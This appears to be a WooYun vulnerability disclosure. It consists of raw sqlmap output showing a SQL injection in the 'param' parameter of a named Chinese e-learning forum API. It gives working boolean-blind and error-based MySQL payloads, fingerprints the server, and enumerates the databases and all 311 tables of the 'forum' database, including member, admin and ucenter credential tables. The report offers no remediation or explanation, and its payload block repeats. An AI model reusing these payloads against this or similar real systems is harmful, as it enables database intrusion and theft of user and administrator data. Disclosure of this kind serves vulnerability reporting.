WooYun.org

http://circle.myctu.cn/api.php?app=userauth:api&mod=plugin&param=uid%3D0&random=0.5043484827037901&_=1428579086625

---
Parameter: param (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=userauth:api&mod=plugin&param=uid=0 RLIKE (SELECT (CASE WHEN (2544=2544) THEN 0x75696425334430 ELSE 0x28 END))&random=0.5043484827037901&_=1428579086625
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=userauth:api&mod=plugin&param=uid=0 AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(6137=6137,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&random=0.5043484827037901&_=1428579086625
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL 5.0
available databases [2]:
[*] forum
[*] information_schema

---
Parameter: param (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=userauth:api&mod=plugin&param=uid=0 RLIKE (SELECT (CASE WHEN (2544=2544) THEN 0x75696425334430 ELSE 0x28 END))&random=0.5043484827037901&_=1428579086625
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=userauth:api&mod=plugin&param=uid=0 AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(6137=6137,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&random=0.5043484827037901&_=1428579086625
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL 5.0
Database: forum
[311 tables]
+------------------------------------+
| fujian                             |
| guangdong                          |
| lt_notice_ignore                   |
| lt_notice_log                      |
| lt_system_msg                      |
| pre_admincp_plaza                  |
| pre_authenticated_users            |
| pre_blog_tag                       |
| pre_click_stats                    |
| pre_commmon_config                 |
| pre_common_addon                   |
| pre_common_admincp_group           |
| pre_common_admincp_member          |
| pre_common_admincp_perm            |
| pre_common_admincp_session         |
| pre_common_admingroup              |
| pre_common_adminnote               |
| pre_common_adminsession            |
| pre_common_advertisement           |
| pre_common_advertisement_custom    |
| pre_common_banned                  |
| pre_common_block                   |
| pre_common_block_item              |
| pre_common_block_item_archive      |
| pre_common_block_permission        |
| pre_common_block_style             |
| pre_common_cache                   |
| pre_common_category                |
| pre_common_credit_log              |
| pre_common_credit_rule             |
| pre_common_credit_rule_log         |
| pre_common_credit_rule_log_field   |
| pre_common_cron                    |
| pre_common_district                |
| pre_common_diy_data                |
| pre_common_failedlogin             |
| pre_common_friendlink              |
| pre_common_group_plugin            |
| pre_common_invite                  |
| pre_common_log                     |
| pre_common_magic                   |
| pre_common_magiclog                |
| pre_common_mailcron                |
| pre_common_mailqueue               |
| pre_common_member                  |
| pre_common_member_count            |
| pre_common_member_field_forum      |
| pre_common_member_field_home       |
| pre_common_member_log              |
| pre_common_member_magic            |
| pre_common_member_profile          |
| pre_common_member_profile_setting  |
| pre_common_member_security         |
| pre_common_member_stat_field       |
| pre_common_member_stat_fieldcache  |
| pre_common_member_stat_search      |
| pre_common_member_stat_searchcache |
| pre_common_member_status           |
| pre_common_member_validate         |
| pre_common_myapp                   |
| pre_common_myinvite                |
| pre_common_mytask                  |
| pre_common_nav                     |
| pre_common_plugin                  |
| pre_common_plugin_category         |
| pre_common_pluginvar               |
| pre_common_process                 |
| pre_common_regip                   |
| pre_common_report                  |
| pre_common_resource                |
| pre_common_searchindex             |
| pre_common_secquestion             |
| pre_common_session                 |
| pre_common_setting                 |
| pre_common_share_log               |
| pre_common_smiley                  |
| pre_common_sphinxcounter           |
| pre_common_stat                    |
| pre_common_statuser                |
| pre_common_style                   |
| pre_common_stylevar                |
| pre_common_syscache                |
| pre_common_task                    |
| pre_common_taskvar                 |
| pre_common_template                |
| pre_common_template_block          |
| pre_common_user_at                 |
| pre_common_user_tag                |
| pre_common_usergroup               |
| pre_common_usergroup_field         |
| pre_common_word                    |
| pre_courses                        |
| pre_doc                            |
| pre_doc_click                      |
| pre_doc_cover                      |
| pre_doc_item                       |
| pre_entrance                       |
| pre_exam                           |
| pre_exam_answer                    |
| pre_exam_question                  |
| pre_expertuser                     |
| pre_extra_class                    |
| pre_extra_compare                  |
| pre_extra_lecture                  |
| pre_extra_org                      |
| pre_extra_relationship             |
| pre_extra_resource                 |
| pre_extrastar                      |
| pre_forum_access                   |
| pre_forum_activity                 |
| pre_forum_activity_select          |
| pre_forum_activityapply            |
| pre_forum_announcement             |
| pre_forum_attachment               |
| pre_forum_attachmentfield          |
| pre_forum_attachtype               |
| pre_forum_bbcode                   |
| pre_forum_creditslog               |
| pre_forum_debate                   |
| pre_forum_debatepost               |
| pre_forum_faq                      |
| pre_forum_forum                    |
| pre_forum_forum_activity           |
| pre_forum_forum_lecturer           |
| pre_forum_forum_threadtable        |
| pre_forum_forumfield               |
| pre_forum_forumrecommend           |
| pre_forum_groupcreditslog          |
| pre_forum_groupfield               |
| pre_forum_groupinvite              |
| pre_forum_grouplevel               |
| pre_forum_groupranking             |
| pre_forum_groupuser                |
| pre_forum_imagetype                |
| pre_forum_labelgroup               |
| pre_forum_medal                    |
| pre_forum_medallog                 |
| pre_forum_memberrecommend          |
| pre_forum_moderator                |
| pre_forum_modwork                  |
| pre_forum_onlinelist               |
| pre_forum_order                    |
| pre_forum_poll                     |
| pre_forum_polloption               |
| pre_forum_pollvoter                |
| pre_forum_post                     |
| pre_forum_post_category            |
| pre_forum_post_tableid             |
| pre_forum_postcomment              |
| pre_forum_postlog                  |
| pre_forum_postposition             |
| pre_forum_promotion                |
| pre_forum_ratelog                  |
| pre_forum_relatedthread            |
| pre_forum_repeats                  |
| pre_forum_rsscache                 |
| pre_forum_spacecache               |
| pre_forum_thread                   |
| pre_forum_threadclass              |
| pre_forum_threadlog                |
| pre_forum_threadmod                |
| pre_forum_threadtype               |
| pre_forum_trade                    |
| pre_forum_tradecomment             |
| pre_forum_tradelog                 |
| pre_forum_typeoption               |
| pre_forum_typeoptionvar            |
| pre_forum_typevar                  |
| pre_forum_userlevel                |
| pre_forum_warning                  |
| pre_global_relation                |
| pre_group_album                    |
| pre_group_course                   |
| pre_group_doc                      |
| pre_group_empirical                |
| pre_group_empirical_log            |
| pre_group_empirical_values         |
| pre_group_live                     |
| pre_group_pic                      |
| pre_group_picfield                 |
| pre_group_share                    |
| pre_groupad                        |
| pre_groupdoc_log                   |
| pre_home_album                     |
| pre_home_album_category            |
| pre_home_appcreditlog              |
| pre_home_attachment                |
| pre_home_blacklist                 |
| pre_home_blog                      |
| pre_home_blog_category             |
| pre_home_blogfield                 |
| pre_home_class                     |
| pre_home_click                     |
| pre_home_clickuser                 |
| pre_home_comment                   |
| pre_home_countpraise               |
| pre_home_doc_class                 |
| pre_home_docomment                 |
| pre_home_doing                     |
| pre_home_favorite                  |
| pre_home_feed                      |
| pre_home_feed_app                  |
| pre_home_feedpraise                |
| pre_home_friend                    |
| pre_home_friend_request            |
| pre_home_friendlog                 |
| pre_home_media                     |
| pre_home_notification              |
| pre_home_notification_visit        |
| pre_home_nwkt                      |
| pre_home_nwkt_class                |
| pre_home_official_link             |
| pre_home_pic                       |
| pre_home_picfield                  |
| pre_home_poke                      |
| pre_home_pokearchive               |
| pre_home_share                     |
| pre_home_sharelog                  |
| pre_home_show                      |
| pre_home_specialuser               |
| pre_home_tag                       |
| pre_home_tagrelation               |
| pre_home_user_tongzhi              |
| pre_home_userapp                   |
| pre_home_userappfield              |
| pre_home_viewlog                   |
| pre_home_visitor                   |
| pre_larnsouce_harvestoption        |
| pre_learn_attachment               |
| pre_learn_credit                   |
| pre_learncredit_record             |
| pre_learning_apply_record          |
| pre_learning_coach                 |
| pre_learning_excitation            |
| pre_lecture_record                 |
| pre_lecturer                       |
| pre_lecturerecord_credit           |
| pre_member_notice                  |
| pre_notice                         |
| pre_notice_type                    |
| pre_notice_userstands              |
| pre_opinion_reply                  |
| pre_pic_tag                        |
| pre_portal_article_content         |
| pre_portal_article_count           |
| pre_portal_article_related         |
| pre_portal_article_title           |
| pre_portal_article_trash           |
| pre_portal_attachment              |
| pre_portal_category                |
| pre_portal_category_permission     |
| pre_portal_comment                 |
| pre_portal_hotspot                 |
| pre_portal_topic                   |
| pre_portal_topic_pic               |
| pre_protal_ignore                  |
| pre_province_level                 |
| pre_questionary                    |
| pre_questionary_class              |
| pre_questionary_question           |
| pre_questionary_questionchoicers   |
| pre_questionary_questionoption     |
| pre_repeats_relation               |
| pre_resourcelist                   |
| pre_sc_record                      |
| pre_sc_relation                    |
| pre_sc_station                     |
| pre_sc_ustation                    |
| pre_selection                      |
| pre_selection_option               |
| pre_selection_record               |
| pre_selection_user_vote_num        |
| pre_share_province                 |
| pre_sharesource                    |
| pre_shlecture                      |
| pre_shlecture_direct               |
| pre_shlecture_stars                |
| pre_shresourcelist                 |
| pre_station                        |
| pre_station_course                 |
| pre_suggestbox                     |
| pre_synchro_cert_info              |
| pre_train_course                   |
| pre_ucenter_admins                 |
| pre_ucenter_applications           |
| pre_ucenter_badwords               |
| pre_ucenter_domains                |
| pre_ucenter_failedlogins           |
| pre_ucenter_feeds                  |
| pre_ucenter_friends                |
| pre_ucenter_mailqueue              |
| pre_ucenter_memberfields           |
| pre_ucenter_members                |
| pre_ucenter_mergemembers           |
| pre_ucenter_newpm                  |
| pre_ucenter_notelist               |
| pre_ucenter_pms                    |
| pre_ucenter_protectedmembers       |
| pre_ucenter_settings               |
| pre_ucenter_sqlcache               |
| pre_ucenter_tags                   |
| pre_ucenter_vars                   |
| pre_user_courses                   |
| pre_user_station                   |
| resouce_mapping                    |
| sichuan                            |
| user_group                         |
| user_map                           |
| user_sync_timestamp                |
| userlogin                          |
| yunnan                             |
+------------------------------------+